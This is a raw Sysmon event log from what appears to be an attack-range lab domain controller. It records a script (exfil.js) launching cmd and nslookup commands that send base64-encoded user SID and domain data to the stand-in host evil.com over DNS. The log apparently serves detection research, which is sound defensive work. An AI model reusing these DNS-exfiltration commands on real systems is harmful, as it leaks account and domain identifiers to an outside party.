14:16:08.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FD3D-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-17A1-629A-783D-000000005F02}55522604C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-FD3D-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.397{2E1864BB-17A8-629A-FD3D-000000005F02}7232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldxnc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.384{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsz.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.353{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73764CD8C82437B41AB44996B079ACEE,SHA256=C4FC5796EDB9D0E2A63C9D9408F6F955D17286C3B81206D8F9B9CE49AC2F16FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-17A8-629A-FB3D-000000005F02}13727756C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-FC3D-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FC3D-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-17A8-629A-FA3D-000000005F02}6087868C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-FC3D-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.347{2E1864BB-17A8-629A-FC3D-000000005F02}3568C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-FA3D-000000005F02}608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsz.tmp 2>&1 23542300x8000000000000000194797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.338{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5294369774C56AB7401B4FE5F77905CC,SHA256=DECD910E768BCC633BA902555C4B5489F77065FBDE7976187C7E9F15456C28FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.306{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-FB3D-000000005F02}1372C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.306{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-FB3D-000000005F02}1372C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.306{2E1864BB-17A8-629A-FB3D-000000005F02}13727756C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-FA3D-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.304{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FB3D-000000005F02}1372C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-FA3D-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-17A1-629A-783D-000000005F02}55524624C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-FA3D-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.297{2E1864BB-17A8-629A-FA3D-000000005F02}608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.283{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlljsq.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.253{2E1864BB-17A8-629A-F83D-000000005F02}57004200C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-F93D-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 